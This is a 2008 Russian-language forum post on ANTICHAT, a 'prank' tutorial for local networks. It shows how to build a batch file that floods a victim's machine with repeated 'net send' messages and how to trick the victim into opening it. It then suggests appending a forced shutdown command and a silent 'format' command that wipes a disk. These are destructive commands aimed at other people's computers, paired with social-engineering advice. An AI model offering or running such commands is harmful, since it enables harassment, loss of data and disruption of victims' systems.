HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка

Опции темы Поиск в этой теме Опции просмотра

Ламерс Студия преставляет-Делаем флуд за 10 минут!
Старый 31.01.2008, 02:59
SanyXou
Новичок
С нами: 9621612

Wink Ламерс Студия преставляет-Делаем флуд за 10 минут!

Здраствуйте дорогие Хацкеры и Ламерки!!!

Сегодня мы с вами розглянем 1 маленькую шалость в В локальной сити и будем роботать с Файлами БАТ!!
НАдеюсь вам понравитсо))Я не буду поеснять что это такое(вы найдёте всё это в сылках в низу)!Перейдём сразу к делу-

Берём открываем тотал командер,заходим на наш диск на котором стоит винда(у меня это С) и смотрим в корне папки файлик AUTOEXEC.Bat(если не видете то в настройках помтавте в тотале чтоб он видел скрытые и ситемные файлы) и копи его на робочий стол например,после того берём его переименовуем например в Флуд компа жертвы,открываем этот файлик блокнотиком и заносим такие строки
net send * "Сюда пишем что будет у нас в сообщении флуда." - Вот воаля флуд готов!Берём делаем копи например:
net send * "Сюда пишем что будет у нас в сообщении флуда."
к примеру 100000000000 рас и сохраняем эту страничку в блокноте!После этого провиряем его НАЖИМАЕМ И У
НАС ВЫЛЕТАЕТ МНОГО СТРОК С ПРЕДЛОЖЕНИЕМ <Сюда пишем что будет у нас в сообщении флуда>!Всё флуд готов мы може его скинуть нашей жертве типо открой норм тема или просто в строку *-дописать чейто IP!(К примеру net send 201.0.0.1 "LUZER."И всё!
Также хорошо будет если вы будите скидовать жертве сам флуд с * в конце строки допишите shutdown.exe -r -f -t 0 -c "LUZER." - Это вырубит комп вашей жертвы после флуда!!!

Также можем создать флуд а потом формат диска))Для этого после строк флуда водим такой лог
format A: /q /y- Здесь мы форматируем дискету!!/y-выходит как ответ на формат!!!

И канешно наж любимый античат не пропустил этой темы и если вам стало интересно про пакости Бат файлов пройдите по этой сылке -- http://old.antichat.ru/txt/old/dhgroup/bat.shtml

И болие мелкое изучение Бат файлов на http://systemnews.com.ru/?mod=art&part=dos&id=001

P.S Прошу не кидать меня сразу в грязь а тему в топку за какийто формальности или ошибки,а лутше их исправить и продолжить столь интересную тему Шалостей в сети или Бат файлы!ТАкже прошу извенить за Орфографические ошибки ибо плохо знаб Русский язык)))

Предыдущая тема Следующая тема